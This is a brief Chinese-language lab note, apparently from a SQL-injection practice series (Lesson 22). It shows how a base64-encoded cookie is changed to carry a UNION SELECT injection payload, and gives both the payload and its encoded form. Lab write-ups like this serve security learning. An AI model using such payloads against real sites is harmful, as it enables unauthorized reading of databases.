Lesson - 22
Cookie Injection - base64 encoded - Double quotes
用admin账号登陆后,查看cookie,发现cookie为:YWRtaW4=
有了上一节的经验,admin的base64编码为:YWRtaW4=。
通过工具更改cookie进行注入。
对SQL注入语句: " union select 1,2,database()#
进行base64_encode:IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj